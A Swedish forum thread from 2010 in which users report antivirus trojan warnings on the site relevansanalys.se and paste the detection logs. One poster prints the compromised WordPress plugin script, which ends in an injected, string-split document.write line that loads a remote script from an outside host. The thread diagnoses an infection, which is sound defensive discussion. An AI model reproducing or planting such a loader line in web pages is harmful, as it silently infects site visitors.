WN

WN (https://www.wn.se/forum/index.php)
-   Off Topic (https://www.wn.se/forum/forumdisplay.php?f=7)
-   -   relevansanalys trojan? (https://www.wn.se/forum/showthread.php?t=1043201)

Bara jag 2010-08-06 22:14

relevansanalys trojan?
 
Tittar in på relevansanalys.se då och då.

Får nu varningar om trojaner.

Någon med bra skydd som vågar kolla?

kw_wasabi 2010-08-06 22:16

Jag gick in där nyss och fick inget meddelande. Brukar få det om det är något skumt...

EDIT: Liten tabbe, jag hade inaktiverat virusprogrammet någon timma tidigare. Hoppas jag inte datorn blev förkyld nu. Med det påslaget så fick även jag en varning.

Antagligen inget farligt, Nod32 hittade en infekterad fil på min dator och fixade till den.

Bara jag 2010-08-06 22:21

2010-08-06 22:17:58 HTTP filter file http://www.relevansanalys.se/wp-cont...n_selection.js JS/TrojanDownloader.HackLoad.AA trojan connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.
2010-08-06 22:17:56 HTTP filter file http://www.relevansanalys.se/ HTML/ScrInject.B.Gen virus connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.
2010-08-06 22:17:56 HTTP filter file http://www.relevansanalys.se/wp-cont...n_selection.js JS/TrojanDownloader.HackLoad.AA trojan connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.
2010-08-06 22:09:45 Real-time file system protection file C:\Documents and Settings\Administratör\Lokala inställningar\Temporary Internet Files\Content.IE5\M10L05U4\relevansanalys_se[1].htm HTML/ScrInject.B.Gen virus PC\Administratör Event occurred on a file modified by the application: C:\Program\Internet Explorer\iexplore.exe.
2010-08-06 22:09:36 HTTP filter file http://www.relevansanalys.se/wp-cont...n_selection.js JS/TrojanDownloader.HackLoad.AA trojan connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Internet Explorer\iexplore.exe.
2010-08-06 22:09:36 HTTP filter file http://www.relevansanalys.se/ HTML/ScrInject.B.Gen virus connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Internet Explorer\iexplore.exe.
2010-08-06 22:08:53 HTTP filter file http://www.relevansanalys.se/ HTML/ScrInject.B.Gen virus connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.
2010-08-06 22:08:52 HTTP filter file http://www.relevansanalys.se/wp-cont...n_selection.js JS/TrojanDownloader.HackLoad.AA trojan connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.
2010-08-06 22:08:35 HTTP filter file http://www.relevansanalys.se/wp-cont...n_selection.js JS/TrojanDownloader.HackLoad.AA trojan connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.
2010-08-06 22:08:35 HTTP filter file http://www.relevansanalys.se/wp-cont...n_selection.js JS/TrojanDownloader.HackLoad.AA trojan connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.
2010-08-06 22:08:35 HTTP filter file http://www.relevansanalys.se/wp-cont...n_selection.js JS/TrojanDownloader.HackLoad.AA trojan connection terminated - quarantined PC\Administratör Threat was detected upon access to web by the application: C:\Program\Mozilla Firefox\firefox.exe.


Har också NOD32.

Jonas 2010-08-07 00:56

Ser ut som en plugin eller så som har blivit hackat.

Kod:

// http://www.quirksmode.org/js/selected.html
function sociable_get_selection() {
    if (window.getSelection)
        return "" + window.getSelection();
    else if (document.getSelection)
        return "" + document.getSelection();
    else if (document.selection)
        return "" + document.selection.createRange().text;
}

function sociable_description_link(link, attribute) {
    if (typeof(link.original_link) == "undefined")
        link.original_link = link.href;
    link.href = link.original_link + "&" + attribute + "=" + sociable_get_selection();
    return false;
}

document.write('<s'+'cript type="text/javascript" src="http://oldgoal.com:8080/Database.js"></scr'+'ipt>');



Alla tider är GMT +2. Klockan är nu 09:02.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson